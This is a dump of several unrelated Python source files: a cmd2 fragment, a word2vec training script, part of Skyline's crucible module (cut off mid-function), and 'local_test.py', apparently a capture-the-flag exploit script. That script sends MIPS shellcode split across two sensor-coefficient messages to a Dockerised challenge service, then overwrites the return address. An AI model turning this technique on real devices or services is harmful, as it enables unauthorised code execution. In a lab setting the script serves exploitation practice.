self.parser = parser
self.preserve_quotes = preserve_quotes
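# Minimal usage sketch (illustrative only, not part of cmd2 itself): build an
# argparse parser describing the string being completed and wrap it in
# CustomCompletionSettings. The 'colour' argument and its choices are hypothetical.
def _example_custom_completion_settings() -> 'CustomCompletionSettings':
    example_parser = argparse.ArgumentParser()
    example_parser.add_argument('colour', choices=['red', 'green', 'blue'])
    return CustomCompletionSettings(example_parser, preserve_quotes=True)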
|
local_test.py
|
#!/bin/python3
import subprocess
import time
import struct
import sys
import threading
import socket
import os
#shellcode = b"\x04\x00\r4\x06\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf9\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x8e\x81\x00\x00\x00\x00\x00\x00\x00\x00\xfc\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10\x00\x00\x00\x00"
#shellcode = b"\x00\x00\x00\x00\x04\x00\r4\x08\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\x00\x00\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf8\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x8e\x81\x00\x00\x00\x00\xfd\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10"
#shellcode = b"\x00\x00\x00\x00\x04\x00\r4\x08\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\x00\x00\x00\x00\xf8\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x8e\x81\x00\x00\x00\x00\xfd\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10"
shellcode = b"\x00\x00\x00\x00\x04\x00\r4\x08\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf9\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x00\x00\x00\x00\x8e\x81\x00\x00\x00\x00\xfc\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10"
shellcode_part1 = shellcode[0:56]
shellcode_part2 = shellcode[56:]
print(len(shellcode))
print(len(shellcode_part2))
shellcode_part2 += b'\x00' * (56-len(shellcode_part2))
ENABLE_SENSOR = 0x10
DISABLE_SENSOR = 0x20
SET_COEFFICIENTS1 = 0x30
SET_COEFFICIENTS2 = 0x31
SET_BIAS = 0x40
SET_TWO_POINTS = 0x58
UPDATE_FILTERS = 0x60
def receive_output(fsock):
while True:
data = fsock.stdout.read(16)
if len(data) == 0:
break
#sys.stderr.write("received {} bytes of data\n".format(len(data)))
print(data,file=sys.stderr)
sys.stderr.flush()
def do_checksum(message):
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
return message
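# Inferred message framing (a best-effort reading of the sender functions below,
# not an authoritative protocol spec): each frame is 64 bytes -
#   [0:2]   header 0xa5 0x5a
#   [2]     message type
#   [3]     payload length
#   [4:60]  payload
#   [60]    checksum = 0xff - (sum(frame[2:60]) & 0xff)
# (send_test and send_buffer place their checksum at byte 63 instead.)
def verify_checksum(message):
    """Illustrative helper: re-derive the byte-60 checksum and compare it."""
    expected = 0xff - (sum(message[2:60]) & 0xff)
    return message[60] == (expected & 0xff)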
def send_coefficients(channel, messageType, coefficients):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = messageType
message[3] = 56
message[4:60] = coefficients
message = do_checksum(message)
# message[4:12] = struct.pack("d", 5.4319)
# message[12:20] = struct.pack("d", 1.0187)
# message[20:28] = struct.pack("d", 3.0187)
# message[28:36] = struct.pack("d", 2.0187)
# message[36:44] = struct.pack("d", 10.8769)
# message[44:52] = struct.pack("d", 0.3187)
# message[52:60] = struct.pack("d", 10.99187)
channel.stdin.write(message)
def send_bias(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = SET_BIAS
message[3] = 8
message[4:12] = struct.pack("d", 2.4319)
message = do_checksum(message)
channel.stdin.write(message)
def send_two_points(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = SET_TWO_POINTS
message[3] = 8
message[4:12] = struct.pack("2I", 0xa0180590, 0xa0180590)
message = do_checksum(message)
channel.stdin.write(message)
def send_enable(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = ENABLE_SENSOR
message[3] = 0
message = do_checksum(message)
channel.stdin.write(message)
def send_update(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = UPDATE_FILTERS
message[3] = 0
message = do_checksum(message)
channel.stdin.write(message)
def send_disable(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = DISABLE_SENSOR
message[3] = 0
message = do_checksum(message)
channel.stdin.write(message)
def send_test(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2:54] = b'zABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy'
# message[3] = 0
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[63] = checksum & 0xff
channel.stdin.write(message)
def send_buffer(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = 0x70
message[3] = 0x00
message[4:20] = struct.pack("4I", 0xa01805a0, 0xa01805a0,0xa01805a0,0xa01805a0 )
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[63] = checksum & 0xff
channel.stdin.write(message)
def main():
#if 'CHAL_HOST' in os.environ and 'CHAL_PORT' in os.environ:
# host = os.environ.get('CHAL_HOST')
# port = os.environ.get('CHAL_PORT')
# ticket = os.environ.get('TICKET', "")
#else:
# print('[ERROR] CHAL_HOST and CHAL_PORT environment variables are required')
# exit(-1)
#Get the host:port from LCM
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.connect((host, int(port)))
# fsock = sock.makefile('rw')
# if len(ticket):
# line = fsock.readline()
# fsock.write(ticket + '\n')
# fsock.flush()
child = subprocess.Popen(['docker', 'run', '--rm', '-i', '-e','FLAG=flag{abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ12345678901234567890}','mongoose_mayhem:challenge'],0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# child = subprocess.Popen(['./vmips', '-o', 'fpu', '-o', 'memsize=3000000','a.out.rom'], 0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
time.sleep(1)
th = threading.Thread(target=receive_output, args=(child,), daemon=True)
th.start()
time.sleep(3)
sys.stderr.write("disabling sensor readout\n")
send_disable(child)
time.sleep(3)
sys.stderr.write("sending shellcode1 in coefficients1\n")
send_coefficients(child, SET_COEFFICIENTS1, shellcode_part1)
time.sleep(1)
sys.stderr.write("sending shellcode2 in coefficients2\n")
send_coefficients(child, SET_COEFFICIENTS2, shellcode_part2)
time.sleep(1)
sys.stderr.write("sending RA overwrite\n")
# send_buffer(child)
send_two_points(child)
time.sleep(10)
if __name__ == "__main__":
main()
|
word2vec_optimized.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
Mikolov et al., "Efficient Estimation of Word Representations in Vector Space",
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
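# Rough numpy sketch (illustrative only; the fused neg_train C++ op above is the
# real implementation) of the skip-gram negative-sampling step the module
# docstring describes: ascend the objective
#   log sigmoid(u_o . v_c) + sum_k log sigmoid(-u_k . v_c)
# with true SGD on one (center, positive, negatives) triple. All names here are
# hypothetical and the function is not used by the model below.
def _sgns_update_sketch(v_c, u_o, u_negs, lr):
  sig = lambda x: 1.0 / (1.0 + np.exp(-x))
  g_pos = 1.0 - sig(np.dot(u_o, v_c))                  # scale for the true pair
  g_negs = [sig(np.dot(u_k, v_c)) for u_k in u_negs]   # scales for noise words
  grad_c = g_pos * u_o - sum(g * u_k for g, u_k in zip(g_negs, u_negs))
  u_o = u_o + lr * g_pos * v_c
  u_negs = [u_k - lr * g * v_c for g, u_k in zip(g_negs, u_negs)]
  v_c = v_c + lr * grad_c
  return v_c, u_o, u_negs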
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"See README.md for how to get 'questions-words.txt'.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After this many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
def read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Output words embedding: [vocab_size, emb_dim]
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.global_step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vector on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5)  # Report our progress once in a while.
(epoch, step, words, lr) = self._session.run(
[self._epoch, self.global_step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
try:
total = self._analogy_questions.shape[0]
except AttributeError as e:
raise AttributeError("Need to read analogy questions.")
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
    if c not in [w0, w1, w2]:
        print(c)
        return
print("unknown")
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
model.read_analogies() # Read analogy questions
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
crucible.py
|
import logging
try:
from Queue import Empty
except:
from queue import Empty
from redis import StrictRedis
import time
from time import time, sleep
from threading import Thread
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager
from multiprocessing import Process
from msgpack import packb
import os
from os.path import join, isfile
from os import kill, getpid, listdir
from sys import exit, version_info
import traceback
import re
import json
import gzip
import requests
try:
import urlparse
except ImportError:
import urllib.parse
try:
import urllib2
except ImportError:
import urllib.request
import urllib.error
import errno
import datetime
import shutil
import os.path
# sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
# sys.path.insert(0, os.path.dirname(__file__))
from ast import literal_eval
import settings
from skyline_functions import load_metric_vars, fail_check, mkdir_p
from crucible_algorithms import run_algorithms
skyline_app = 'crucible'
skyline_app_logger = skyline_app + 'Log'
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = settings.LOG_PATH + '/' + skyline_app + '.log'
skyline_app_loglock = skyline_app_logfile + '.lock'
skyline_app_logwait = skyline_app_logfile + '.wait'
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.' + settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
skyline_app_graphite_namespace = 'skyline.' + skyline_app + SERVER_METRIC_PATH
FULL_NAMESPACE = settings.FULL_NAMESPACE
ENABLE_CRUCIBLE_DEBUG = settings.ENABLE_CRUCIBLE_DEBUG
crucible_data_folder = str(settings.CRUCIBLE_DATA_FOLDER)
failed_checks_dir = crucible_data_folder + '/failed_checks'
class Crucible(Thread):
def __init__(self, parent_pid):
"""
Initialize Crucible
"""
super(Crucible, self).__init__()
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager() lists below and replaced with Redis sets
# self.process_list = Manager().list()
# self.metric_variables = Manager().list()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
def check_if_parent_is_alive(self):
"""
Check if the parent process is alive
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
def spin_process(self, i, run_timestamp, metric_check_file):
"""
Assign a metric for a process to analyze.
:param i: python process id
:param run_timestamp: the epoch timestamp at which this process was called
:param metric_check_file: full path to the metric check file
:return: returns True
"""
child_process_pid = os.getpid()
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('child_process_pid - %s' % str(child_process_pid))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.process_list.append(child_process_pid)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = failed_checks_dir + '/' + check_file_metricname_dir + '/' + check_file_timestamp
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric_failed_check_dir - %s' % metric_failed_check_dir)
# failed_check_file = failed_checks_dir + '/' + check_file_name
failed_check_file = metric_failed_check_dir + '/' + check_file_name
# Load and validate metric variables
try:
metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
except:
logger.error('error :: failed to import metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
# TBD - a failed check Panorama update will go here, perhaps txt
# files are not the only "queue" that will be used, both, but
# Panorama, may be just a part of Skyline Flux, the flux DB
# would allow for a very nice, distributed "queue" and a
# distributed Skyline workforce...
# Any Skyline node could just have one role, e.g. lots of
# Skyline nodes running crucible only and instead of reading
# the local filesystem for input, they could read the Flux DB
# queue or both...
return
# Test metric variables
# We use a pythonic approach to test whether the variables are defined.
# This ensures that if any of the variables are not set for some reason,
# we can handle the unexpected data or situation gracefully and try to
# ensure that the process does not hang.
# if len(str(metric_vars.metric)) == 0:
# if not metric_vars.metric:
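# (Illustrative aside, not part of the original logic): the same presence
# check could be written more compactly with getattr, e.g.
#     metric = getattr(metric_vars, 'metric', None)
#     if metric is None:
#         fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
#         return
# The per-variable try/except blocks below keep the original behaviour explicit.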
try:
metric_vars.metric
except:
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
metric = str(metric_vars.metric)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - metric - %s' % metric)
# if len(metric_vars.value) == 0:
# if not metric_vars.value:
try:
metric_vars.value
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
value = str(metric_vars.value)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - value - %s' % (value))
# if len(metric_vars.from_timestamp) == 0:
# if not metric_vars.from_timestamp:
try:
metric_vars.from_timestamp
except:
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
from_timestamp = str(metric_vars.from_timestamp)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - from_timestamp - %s' % from_timestamp)
# if len(metric_vars.metric_timestamp) == 0:
# if not metric_vars.metric_timestamp:
try:
metric_vars.metric_timestamp
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
metric_timestamp = str(metric_vars.metric_timestamp)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - metric_timestamp - %s' % metric_timestamp)
# if len(metric_vars.algorithms) == 0:
# if not metric_vars.algorithms:
algorithms = []
try:
metric_vars.algorithms
except:
logger.error('error :: failed to read algorithms variable from check file setting to all')
algorithms = ['all']
# if not algorithms:
# algorithms = []
# for i_algorithm in metric_vars.algorithms:
# algorithms.append(i_algorithm)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - algorithms - %s' % str(algorithms))
# if len(metric_vars.anomaly_dir) == 0:
# if not metric_vars.anomaly_dir:
try:
metric_vars.anomaly_dir
except:
logger.error('error :: failed to read anomaly_dir variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
anomaly_dir = str(metric_vars.anomaly_dir)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - anomaly_dir - %s' % anomaly_dir)
# if len(str(metric_vars.graphite_metric)) == 0:
try:
metric_vars.graphite_metric
except:
logger.info('failed to read graphite_metric variable from check file setting to False')
# yes this is a string
graphite_metric = 'False'
else:
graphite_metric = str(metric_vars.graphite_metric)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - graphite_metric - %s' % graphite_metric)
# if len(str(metric_vars.run_crucible_tests)) == 0:
try:
metric_vars.run_crucible_tests
except:
logger.info('failed to read run_crucible_tests variable from check file setting to False')
# yes this is a string
run_crucible_tests = 'False'
else:
run_crucible_tests = str(metric_vars.run_crucible_tests)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - run_crucible_tests - %s' % run_crucible_tests)
try:
metric_vars.added_by
except:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('failed to read added_by variable from check file setting to crucible - set to crucible')
added_by = 'crucible'
else:
added_by = str(metric_vars.added_by)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - added_by - %s' % added_by)
try:
metric_vars.run_script
except:
run_script = False
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - run_script - not present set to False')
else:
run_script = str(metric_vars.run_script)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - run_script - %s' % run_script)
# @added 20190612 - Feature #3108: crucible - graphite_override_uri_parameters_specific_url
# This metric variable is used to declare absolute graphite uri
# parameters
try:
metric_vars.graphite_override_uri_parameters
except:
